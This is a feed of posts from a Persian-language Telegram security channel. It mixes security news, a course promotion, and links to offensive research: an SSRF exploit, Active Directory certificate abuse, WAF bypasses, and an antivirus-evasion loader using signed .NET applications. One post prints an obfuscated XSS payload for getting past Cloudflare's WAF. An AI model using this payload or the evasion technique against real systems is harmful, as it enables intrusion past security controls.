Network Security Channel

⭕️ دو هفته دسترسی رایگان
🖥 به تمام دوره‌های سایت 365DataScience
🔥 دسترسی رایگان به تمام دوره‌های علوم داده
✅ بدون هیچ‌گونه محدودیتی!
🗓 از 6 نوامبر تا 20 نوامبر

👨🏻‍💻 سایت 365DataScience از 6 نوامبر به مدت دو هفته، دسترسی رایگان و نامحدود به تمامی دوره‌های علوم داده رو، بدون هیچ گونه محدودیتی و نیازی به کارت اعتباری ایجاد کرده! 💯

🟣 از همین امروز! فرصت دارین تا با ایجاد فقط یک حساب کاربری با یک ایمیل، رایگان به تمام دوره‌های علوم داده سایت 365DataScience دسترسی داشته باشین.

🎯 با گذروندن این دوره‌ها می‌تونین یه نقشه راه کاملا منظم رو تجربه کنین، با تمرین‌های عملی دانشتون رو محک بزنین، روی پروژه‌های داده‌های دنیای واقعی کار کنین و در نعایت گواهینامه‌های شناخته شده و کاملا معتبر رو بدون هیچ هزینه‌ای دریافت کنید.

📌 لینک دسترسی به دوره‌های 365DataScience:👇🏼

┌ 🏷 Free Access Week | Nov 6 – Nov 20
└ 🚀 All Data & AI Courses 100% FREE

#️⃣ #علم_داده #DataScience
➖➖➖➖➖
@Engineer_Computer

❤3

704 views04:39

Server-side request forgery (SSRF)
https://github.com/errorfiathck/ssrf-exploit

@Engineer_Computer

❤1

179 views20:07

Network Security Channel

لیست اکسپلویت های که APT گروه های چینی از سال 2021 تاکنون گمان میرود استفاده کردند
گزارش recorded future
https://www.recordedfuture.com/charting-chinas-climb-leading-global-cyber-power

@Engineer_Computer

171 views20:08

Network Security Channel

‏12 تا 20 سال حبس در انتظار هکر روسی که به ارتش سایبری اوکراین کمک میکرد و توسط سرویس fsb دستگیر شده است.
https://t.co/Vepil0tlAA

@Engineer_Computer

BleepingComputer

FSB arrests Russian hackers working for Ukrainian cyber forces

Russia's security agency published a press release on Tuesday saying that its officers detained two hackers who either assisted or joined Ukraine's hackers in cyber operations.

158 views20:09

Network Security Channel

یک مقاله تحقیقاتی ارزشمند در خصوص مشکلات در فرآیند مدیریت آسیب پذیری در جهان

https://blog.aquasec.com/50-shades-of-vulnerabilities-uncovering-flaws-in-open-source-vulnerability-disclosures

@Engineer_Computer

Aqua

50 Shades of Vulnerabilities: Uncovering Flaws in Open-Source Vulnerability Disclosures

Nautilus researchers evaluated the disclosure process of open-source projects and found flaws that allowed harvesting the vulnerabilities before patched

182 views20:10

Network Security Channel

Achieving GRC Excellence The Roadmap to a Career in GRC.pdf

2.6 MB

آشنایی با GRC و نقشه راه آن

@Engineer_Computer

209 views20:10

Network Security Channel

سوء استفاده از ابزار سرویس سرتیفیکیت اکتیو

https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-3/

@Engineer_Computer

Black Hills Information Security, Inc.

Abusing Active Directory Certificate Services (Part 3) - Black Hills Information Security, Inc.

| Alyssa Snow In PART ONE and PART TWO of this blog series, we discussed common misconfigurations of Active Directory certificate templates. In this post, we will walk through exploitation […]

799 views21:04

Network Security Channel

🗒 Cloudflare bypass WAF

Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;

@Engineer_Computer

189 views21:06

Network Security Channel

🗒 Telegram bug bounties XSS, privacy issues, official bot exploitation

https://davtur19.medium.com/telegram-bug-bounties-xss-privacy-issues-official-bot-exploitation-and-more-5277fa78435

@Engineer_Computer

187 views21:06

Network Security Channel

🗒 3 tricks to bypass Cloudflare WAF in file upload

https://medium.com/numen-cyber-labs/3-tricks-to-bypass-cloudflare-waf-in-file-upload-9abb83530cfc

@Engineer_Computer

Medium

3 tricks to bypass Cloudflare WAF in file upload

For Cloudflare customers, having Cloudflare is like paying a peace of mind insurance that your system will get 99% protection against…

199 views21:06

Network Security Channel

0:52

This media is not supported in your browser

VIEW IN TELEGRAM

RCE of Burp Scanner / Crawler via Clickjacking

https://hackerone.com/reports/1274695

@Engineer_Computer

193 views21:06

Network Security Channel

Handbook for CTFers.pdf

45.9 MB

🗒 Handbook for CTF
@Engineer_Computer

214 views21:07

Network Security Channel

رودمپ پن تست

https://happy-walleye-9fc.notion.site/Pentest-Cheklist-153cef4934a54e58a80d43be2917f8ca

@Engineer_Computer

happy-walleye-9fc on Notion

Pentest Cheklist | Notion

Recon Phase

🔥1

206 viewsedited 08:16

Network Security Channel

‏⭕️ یکی از راه های دور زدن execution policy و AV ها استفاده از فایل های SIGN شده توسط کمپانی های معتبر است.
در لینک زیر یک لیست مناسب از ‏Net Application. های مورد تایید Microsoft جمع آوری شده ، که ما میتوانیم با استفاده از فایل های Config. فایل های DLL را فراخوانی کنیم به طوری که از قبل مورد تایید قرار گرفته باشد.

https://github.com/Mr-Un1k0d3r/.NetConfigLoader
#RedTeam #MalDev

@Engineer_Computer

GitHub

GitHub - Mr-Un1k0d3r/.NetConfigLoader: .net config loader

.net config loader. Contribute to Mr-Un1k0d3r/.NetConfigLoader development by creating an account on GitHub.

191 views14:32

About

Blog

Apps

Platform